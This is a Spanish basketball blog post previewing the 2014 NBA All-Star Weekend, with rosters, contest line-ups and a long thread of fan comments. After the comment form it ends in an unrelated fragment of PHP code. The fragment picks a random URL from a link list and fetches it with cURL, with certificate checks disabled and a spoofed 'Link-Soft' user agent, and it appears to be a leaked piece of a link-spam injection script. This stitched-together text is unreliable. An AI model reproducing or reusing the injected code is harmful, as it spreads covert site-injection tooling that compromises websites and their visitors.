All-star Weekend 2014: Alguno lo veremos.

14 de February de 2014 por TheDeerHunter

Fin de semana único en la temporada. Denostado por algunos, disfrutado por unos pocos… seguido por alguno más de lo que les gustaría confesar. No diremos eso de que “os damos las llaves del chalecito” porque puede que algún miembro del staff aparezca por aquí en algún momento para comentar en directo. Siempre que haya alguien con quien comentar, por supuesto. Aquí abrimos el post de rigor por si os apetece pasaros.

De menú. Hoy viernes, 3:10h por yomvi.es el siempre polémico Rising Stars Challenge. Los siguientes participantes, sobre los que hasta que no sabemos qué hora aún se puede votar quintetos titulares en NBA.com

TEAM HILL

Damian Lillard (Portland, Soph.)
Bradley Beal (Washington, Soph.)
Andre Drummond (Detroit, Soph.)
Harrison Barnes (Golden State, Soph.)
Terrence Jones (Houston, Soph.)
Giannis Antetokounmpo (Milwaukee, Rookie)
Jonas Valanciunas (Toronto, Soph.)
Dion Waiters (Cleveland, Soph.)
Miles Plumlee (Phoenix, Soph.) … en lugar de Pero Antic

TEAM WEBBER

Anthony Davis (New Orleans, Soph.)
Michael Carter-Williams (Philadelphia, Rookie)
Tim Hardaway Jr. (New York, Rookie)
Trey Burke (Utah, Rookie)
Jared Sullinger (Boston, Soph.)
Mason Plumlee (Brooklyn, Rookie)
Victor Oladipo (Orlando, Rookie)
Steven Adams (OKC, Rookie)
Kelly Olynyk (Boston, Rookie)

Que sí. Que suele ser lo más parecido a partido de patio de colegio que se puede encontrar. Talento hay para parar un carro, así que si alguno hace el sacrificio de darles una oportunidad a los chavales igual nos encontramos con algún detalle interesante.

El sábado 15 el asunto comenzará a las 2:30h. Tocan concursos.
El primer evento será el Sears Shooting Stars, eso de los tríos (no empecemos) mixtos lanzando a canasta como si no hubiera un mañana. Antiguamente solían hacer “equipillos” representantes de ciudades con equipo femenino y alguna vieja gloria dispuesta a sudar un poco. Ahora los hacen un poco al tun-tun, supongo para no discriminar a nadie. Se deja ver si no tienes algo mejor que hacer.
Después concurso de habilidades o Skills Challenge como dicen los USAnos. Contará con la participación de Antetokounmpo, DeRozan, Carter-Williams, Oladipo, Burke, Lillard, Dragic y Reggie Jackson. Tanto éste como el anterior tuvieron su puntito al principio. El problema diría que visto uno vistos todos.
Después el concurso de triples con Kyrie Irving para defender su título ante Afflalo, Beal, Joe Johnson, Belinelli, Curry, Lillard y Love. Para muchos últimamente es lo mejor de la jornada del sábado. Otros diréis que pasa como lo anterior… Para mí es una tradición que ójala no se pierda mientras respire.
Finalmente el Slam Dunk. Paul George, John Wall, Terrence Ross, McLemore, Lillard y Barnes. Veremos si lo llevan mínimamente preparado, pero los participantes tienen atractivo suficiente como para que les demos una oportunidad. Lamentablemente frecuentemente decepciona… y en parte es lógico.

Domingo el plato fuerte. 2:45h la 63ª edición del all-star game.

ESTE

Carmelo Anthony (New York)
Chris Bosh (Miami)
DeMar DeRozan (Toronto)
Paul George (Indiana)
Roy Hibbert (Indiana)
Kyrie Irving (Cleveland)
LeBron James (Miami)
Joe Johnson (Brooklyn)
Paul Millsap (Atlanta)
Joakim Noah (Chicago)
Dwyane Wade (Miami)
John Wall (Washington)
Entrenador: Frank Vogel

OESTE:

LaMarcus Aldridge (Portland)
Anthony Davis (New Orleans) en lugar de Kobe Bryant
Stephen Curry (Golden State)
Kevin Durant (OKC)
Blake Griffin (L.A. Clippers)
James Harden (Houston)
Dwight Howard (Houston)
Damian Lillard (Portland)
Kevin Love (Minnesota)
Dirk Nowitzki (Dallas)
Tony Parker (San Antonio)
Chris Paul (L.A. Clippers)
Entrenador: Scott Brooks

Como siempre división de opiniones. Creo que todos mojaríamos el calzoncillo imaginándolos jugarse las habichuelas a muerte y, de paso, que los técnicos pudieran implementar sus sistemas a muerte. Como eso no es posible por definición para muchos una pachanga y otros simplemente se conforman con verles jugar juntos e intentar alguna jugada bonita. A ver si hay suerte y LeBron se enfada, que en las últimos 5 ediciones, 4 las han ganado el Oeste.

Eso es todo. Nos vemos por estos lares.

Comenta

33 comentarios a esta entrada

  1. Denise dice:
    #1

    Como siempre digo por estas fechas, el único eveneto que me merece la pena (y lo veré en diferido) es el concurso de triples, que además, a diferencia de los mates, tiene un ganador honesto. Gana el mejor y punto, más allá de quien sea más o menos mediático.
    Agradecería si alguien me dijese si el All-Star tiene en EEUU mucha audiencia ó no, porque creo que lo mejor que podría pasar es una caida en picado de share para que Adam Silver se replantee hacer algo más interesante como un torneo formato Copa.

      Citar

  2. rumbero dice:
    #2

    Yo el de hoy me lo salto, pero mañana estoy el pie del cañon ni res ue sea para para rajar un rato

      Citar

  3. Ruxixon dice:
    #3

    Yo veré los concursos,probablemente en diferido para evitar en la medida de lo posible la publi.De los partidos pasando,sólo si alguno de vosotros dice que hay que ver alguna jugada en concreto veré un resumen..lo dice uno para el cual esta es una de las mejores jugadas de los últimos años

    http://www.youtube.com/watch?v=0VUpbTztTKQ

    xDD

      Citar

  4. TheDeerHunter dice:
    #4

    Confieso que llevaba tiempo sin atreverme a ver un partido de los chavales. Me temía lo peor.
    Al contrario, esta primera parte me ha parecido bastante buena. Por supuesto han habido precipitaciones y algunas defensas bastante lights, pero también han habido grandes acciones defensivas (A. Davis… y hasta 6 tapones del Hill Team) y algunas faltas bastante duras. Ostión de Davis a Drummond mandándolo a la línea y esforzándose en secarlo después del festival de sus primeros minutos.
    Y es que lo de Drummond al principio ha sido impresionante. 16 puntos, 10 rebotes en 9 minutos. Arrasando. De momento MVP de largo.

      Citar

  5. Sancho88 dice:
    #5

    Lo mejor el alley-hoop de Jonas Valanciunas. 😀 Quien lo esté viendo me va a entender. Igualito al triplaco de Garbajosa hace años. Hoy Oladipo también se ha tirado un Garbajosa. Drummond es un carpanta!!

      Citar

  6. Sancho88 dice:
    #6

    Waiters vs. Hardaway Jr. Lo mejor del partido del viernes.

      Citar

  7. nba dice:
    #7

    a Lillard solo le falta ya hacer de mascota, si va a estar en todos los saraos,
    a ver si las lesiones lo respetan que hay base para rato

      Citar

  8. Oli dice:
    #8

    Yo también me he atrevido a verlo y ha estado mucho mejor que otros a?os, el pique entre Waiters y Hardaway Jr se lo recomiendo a los que no lo hayáis visto, espero que haya un pique así el domingo con los mayores, disfrutariamos mucho jeje

      Citar

  9. Denise dice:
    #9

    En el All Star de los famosos ha habido algo de calidad, de la mano del Ministro de Educación, Arne Duncan.
    ¿Os imaginais si eso se hiciera aquí? Wert jugando con un águila tatuado en el biceps derecho… El punch de Kermit Washington le haría yo…

      Citar

  10. TheDeerHunter dice:
    #10

    Qué grande!! oO/
    Y qué mala leche tienes Denise, mente criminal. XD XD XD

      Citar

  11. rumbero dice:
    #11

    Joe Johnson, el hijo del viento

      Citar

  12. The wolf dice:
    #12

    Concurso de mates bochornoso

      Citar

  13. rumbero dice:
    #13

    De las mayores castañas de concurso de mates que recuerdo. El formato ha sido una auténtica pedrada: un pseudo calentamiento y pocos mates y normalitos quitando el de Wall y el cuarto intento de George

      Citar

  14. Simon dice:
    #14

    jajajajaj madremia pero es que seguís viéndolo??? yo hace ya varios años que ni lo miro con el tiempo que dediquen en deportes cuatro hoy al all-star me sobra y me basta.
    Cada año es peor y sobretodo cada vez los jugadores le ponen menos imaginación. Sería más interesante que la NBA cancelara el all-star tal y como lo conocemos y organizara algo distinto con otro formato. No sé… con duelos individuales o algo pero es que el formato actual es infumable. Sobretodo los mates.
    De esto ya se ha hablado largo y tendido pero una especie de copa tampoco estaría mal. Lo que no se es cómo lo encajarían los equipos porque no es fácil que un torneo de nueva creación cogiera prestigio y más allí que ya tienen la idea como dijo Carmelo de que el all-star es un momento para descansar y desconectar de la competición durante tres o cuatro días.

      Citar

  15. jhc dice:
    #15

    yo este ha sido el ultimo año que lo veo… no malgasto más una noche de sueño para ver el truño este…

      Citar

  16. Denise dice:
    #16

    Jo jo, me disponía a ver el resumen en diferido, pero con estos comentarios paso de gastar 15 minutos de vida.
    Belinelli ganador de triples y Wall de mates, por cierto.

      Citar

  17. Sancho88 dice:
    #17

    Castañaca padre de noche de concursos. Lo mejor la negra que competía con el Team Durant en el concurso de tirar desde el medio campo. La rubia tampoco estuvo mal, parece ser que las dos son rookies de la WNBA que van para estrellas. Después, lo de los conos y tal, lo de las habilidades, solo que estuviera Antekotoumpo allí y consiguiera completar el circuito, ya lo dice todo de la dificultad de ese concurso. Los triples con un nivel medio-bajo salvo la final que se igualó y hubo que recurrir a la prórroga entre Belinelli y Beal. Muy bien Belinelli que seguramente ha sido el mejor de todos los participantes esta noche. No bajó en ninguna de sus tres rondas de 19 puntos y se llevó el desempate con 24. Sigue aumentando el elenco de europeos con títulos en el concurso de triples. Dos consiguió Stojakovic, uno Nowitzki y ahora se suma Belinelli. Quiere decir que en Europa aún se siguen formando jugadores serios que se toman las cosas en serio. Penoso lo de Johnson, es que da una pena terrible terrible. Ya es seguro que Stephenson hubiera brillado mucho más que él. A Irving, Beal y Afflalo se les debería haber unido Korver, pero se rajó para estar con su familia. E hizo bien, esto cada días es más pachanga, aunque parezca imposible, pero aquí seguiremos los masocas viendo esta mierda un año tras otro.

    Las luces mal, el escenario una mierda, el público dormido, todo desorganizado, el raperillo un minga floja… todo muy light. Y bueno, lo de los mates ya… mejor no comentar. La mierda mayor del reino, lo peor de la historia, ni concurso de Jeremy Evans ni nada. Esto fue muchísimo peor. Y el mate ganador de Wall lo supera el paquete de Thanasis Antetokoumpo en la D-League saltando por encima de su hermano. McLemore se ha hecho ahí una mierda para saltar al silla de Shaq… y poco más. Lo de George estuvo bien pero era el cuarto intento, hubo dos de Lillard decentes en la ronda previa… y absolutamente nada más. Bien el Wall dance al final para celebrarlo, y todos a sobar y el concurso este que se lo metan por la concha de su madre, que dirían en la patria de Esteban. A mamarla los yankis estos.

    Mejor nos quedamos con el duelo final en la D-League. Al menos Tony Mitchell y Ra’Shad James sí saben machacar. Los pros han demostrado que no. Ni hubo 720 de McLemore ni nada. Una mierda

      Citar

  18. TheDeerHunter dice:
    #18

    A ver… se pueden decir muchas cosas, pero no me fastidies que te parece superior el mate del hermano de Antetokoumpo que el de John Wall…

    Debo de decir que hoy no estoy en muy buena disposición para hablar, porque me quedé dormido en el Shooting Stars (la edad, ya lo sé) pero esta mañana he visto muchas cosas y no me ha parecido tan sumamente malo como decís.
    1) El concurso de tiro y el de habilidades son simples preliminares. Sencillitos pero entretenidos. Los de anoche fueron como todos, ni mejor ni peor, con un punto de emoción en el empate de las habilidades. Pero bueno seguro que nadie se queda viendo el evento por esos dos concursos.
    2) El concurso de triples. 24 es una cifra bastante considerable y el que hubiera desempate tampoco es frecuente. El nivel medio, pues bueno… el que fue. A la altura de la mayoría. A mí me parece que sigue molando y seguirá molando.
    3) Concurso de mates. Efectivamente grotesco en cuanto al formato. Al menos van probando cosas aunque no termine de funcionar. Lo prefiero así de mal que que no hubiera como llegó a ocurrir. Al menos podemos ver algún buen mate y uno excelente (para mí) El de John Wall.
    He visto también buenos mates en lo de la D-League… pero también estaríamos jurando en arameo si en el de los mayores hubieramos visto algunos de esos mates.

    Si yo tuviera nanos me gustaría que el all-star week-end siguira existiendo. Y como dijo un buen amigo el otro día en Europa nos creemos los putos amos de la competitividad y de la pureza de este deporte… pero tanto en eso, como en lo de montar espectáculos ni hartos de vino podemos dar consejos a los americanos.

      Citar

  19. Sancho88 dice:
    #19

    Pue Deer, el espectáculo de anoche fue lamentable. Yo aplaudo muchos all stars que hacen, pero el de anoche fue malísimo. Es mi opinión. Y vale, el mate de Wall era mejor que el de Thanasis, pero ha ganado por incomparecencia del resto. Y yo critico el formato porque se queda muy light en el directo. La ronda de minuto y medio con los mates freestyles fue un despropósito, nadie sabía que tenía que hacer. A mí se me pasaron los concursos sin divertirme y sin ver nada especial. Pero bueno, para gustos los colores. No espero nada esta noche, creo que volverá a ser la misma mierda de todos los años

      Citar

  20. Sancho88 dice:
    #20

    Menos mal que seguimos teniendo los playoffs NBA, que eso sí que todos los años no defrauda. Ahora que descansen, pero en junio yo quiero ver a LeBron, Duncan, Timmy y George a tope y dejándose todo en la cancha. Hay ganas de playoffs, porque la regular está siendo un tanto sosota, sobre todo en el Este. Muy bien en el Oeste Portland y Suns, las sorpresas del año, Warriors y Minesotta decepcionando, Rockets cumpliendo y Lakers lo esperado. En el este todos una mierda menos Miami, Indiana y Toronto

      Citar

  21. Sancho88 dice:
    #21

    LeBron, Durant, Timmy… quería decir

      Citar

  22. TheDeerHunter dice:
    #22

    Sancho88:
    Pue Deer, el espectáculo de anoche fue lamentable. Yo aplaudo muchos all stars que hacen, pero el de anoche fue malísimo. Es mi opinión. Y vale, el mate de Wall era mejor que el de Thanasis, pero ha ganado por incomparecencia del resto. Y yo critico el formato porque se queda muy light en el directo. La ronda de minuto y medio con los mates freestyles fue un despropósito, nadie sabía que tenía que hacer. A mí se me pasaron los concursos sin divertirme y sin ver nada especial. Pero bueno, para gustos los colores. No espero nada esta noche, creo que volverá a ser la misma mierda de todos los años

    Lo del formato no lo he discutido, Sancho. Por ahí fue de los peores que hayamos visto.

      Citar

  23. Denise dice:
    #23

    TheDeerHunter:

    Si yo tuviera nanos me gustaría que el all-star week-end siguira existiendo. Y como dijo un buen amigo el otro día en Europa nos creemos los putos amos de la competitividad y de la pureza de este deporte… pero tanto en eso, como en lo de montar espectáculos ni hartos de vino podemos dar consejos a los americanos.

    Yo el All-Star soy incapaz de tragarmelo ni con 50 hijos, pero en este párrafo tienes toda la razón, en Europa no se sabe vender ningún producto, ya que hablamos de baloncesto aquí, concretamente el baloncesto a nivel europeo está muerto. Si el formato de los mates os parece mierda, el de la Euroliga es aún peor, por no hablar de las audiencias y del escaso interés general. De las ligas nacionales con equipos que merecen ascender ó descender y no lo hacen por motivos económicos, ó los nombres de los equipos con esos sponsors de risa…
    Conclusión, que algo hacen bien los americanos y mal los europeos, cuando tu charlas con tus amigos, con los compañeros de trabajo, de universidad, de lo que sea, y más o menos, todo el mundo sabe algo de NBA mientrás que de basket europeo no tienen ni pajolera idea, más allá de la selección española ó de algún Madrid-Barça. Al menos, así es mi experiencia.

      Citar

  24. Txusma dice:
    #24

    Deer, ese buen amigo tuyo tiene mucha idea…

    Lo primero que tengo q hacer es cagarme en yomvi y la madre q los parió. Yo lo tenía todo preparado para conectar la tablet al TV y llega el momento y descubro q en Android no funciona. Ya ves, tan solo más del 80% de dispostivos moviles lo utilizan. Vergonzoso. Me entró tanta mala ostia q ya ni intenté otras opciones y me fuí a dormir.

    Hoy me he visto los concursos en diferido y el de los triples ha estado bien gracias a Beal y Bellinelli. Tened en cuenta q este año había un carro en el q todos los balones contaban doble por lo q un 24 es como un 20-21 de un año normal. Q tampoco es mala puntuación…

    Los mates tristisimos. En la ronda previa ha habido buenos mates de Lillard, George, McLemore, etc. pero han pasado totalmente desapercibidos. Después, el mate de Wall es muy bueno y tb destaco el de George y el de McLemore sobre Shaq (pasa sobrado, no?). No sé ni cuantos intentos hicieron cada uno ni me fijo tanto en la parafernalia. Concurso flojo pero en buena parte por culpa del formato creo yo. Me han sorprendido los muelles de Wall, la verdad. Tb he visto el concurso de mates de la D-League. Eso sí q son muelles!! No es q sean el colmo de la originalidad (es q debe estar todo inventado) pero he visto mucha potencia y me ha gustado.

    El All Star es el q es y tampoco hay q darle muchas más vueltas. Los americanos no van a hacer una copa así que podemos olvidarlo. Llevan ya 40 partidos en la piernas y 3-4 días de descanso les viene genial. El problema es q antes el All Star era casi la única oportunidad q había para ver a los cracks de la NBA y ahora, si queremos, los vemos todos los días y tenemos TOP-10 diarios y reportajes y estamos sobresaturados de información. Eso se nota.

      Citar

  25. Jose Luis dice:
    #25

    nI un comentario del all star de los mayores en el blog xDDDDDDDD

      Citar

  26. Jose Luis dice:
    #26

    “Teníamos un plan que competir en cada jugada, hacer la mejor defensa posible y al final todo lo que establecimos como estrategia resultó porque lo ejecutamos”, comentó Irving.

    Sí…. la mejor defensa xD

      Citar

  27. rumbero dice:
    #27

    Jose Luis:
    “Teníamos un plan que competir en cada jugada, hacer la mejor defensa posible y al final todo lo que establecimos como estrategia resultó porque lo ejecutamos”, comentó Irving.

    Sí…. la mejor defensa xD

    Jaja la madre que lo parió. Eso dijo? Si ayer no se petaron más récords porque no quedaban. Récord de anotación conjunta al descanso y al final del partido, de asistencias, de triples anotados y máximo de puntos para el este con 163. Eso sí, 0 tapones entre ambos equipos! Obviando la inexistencia de defensa alguna, las típicas jugaditas y mates de cada año y las “ganas” de llevarse el partido (o mejor dicho ser MVP) de Irving, Anthony, Durant y Griffin

      Citar

  28. Ruxixon dice:
    #28

    Habrá que tomárselo como los profesionales: dedicar el fin de semana a recuperar el sueño perdido por la NBA o a pasarlo con nuestras familias xD

      Citar

  29. Jose Luis dice:
    #29

    +1 Ruxixon jajajajaja en el all star descansamos todos.

      Citar

  30. Chipi dice:
    #30

    Y cuando el Creador le dio las tablas de la ley a Moses, Moses Malone, le dijo: “Ningún curso baloncestístico será completo si no se discute sobre la Santa Trinidad:
    1.- Franquicias europeas en el futuro.
    2.- Posible traspaso de Gasol.
    3.- Idoneidad, formato e impacto del All Star Weekend”.

    (Carta a los Mavericks, 10-18)

      Citar

  31. Ruxixon dice:
    #31

    Mi último comentario del All Star -tampoco se merece mucho más- será para dar un palo -un palooooooo!!!- a JoJo y Barnes,los “mejores” en los concursos de triples y mates.Sangre fria a puñados,la presión no pudo con ellos.

    Muy bueno tu comentario Chipi,jajaj,cuando querais hablamos de cuántos partidos ganaría el Real Madrid en la NBA 😉

      Citar

  32. rumbero dice:
    #32

    Chipi:
    Y cuando el Creador le dio las tablas de la ley a Moses, Moses Malone, le dijo: “Ningún curso baloncestístico será completo si no se discute sobre la Santa Trinidad:
    1.- Franquicias europeas en el futuro.
    2.- Posible traspaso de Gasol.
    3.- Idoneidad, formato e impacto del All Star Weekend”.

    (Carta a los Mavericks, 10-18)

    :_) Comentario top de lo que llevamos de temporada

      Citar

  33. Denise dice:
    #33

    Chipi:
    Y cuando el Creador le dio las tablas de la ley a Moses, Moses Malone, le dijo: “Ningún curso baloncestístico será completo si no se discute sobre la Santa Trinidad:
    1.- Franquicias europeas en el futuro.
    2.- Posible traspaso de Gasol.
    3.- Idoneidad, formato e impacto del All Star Weekend”.

    (Carta a los Mavericks, 10-18)

    jeje, falta el de “No nombrarás el nombre de Blake Griffin en vano” aunque ese es más del blog..xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>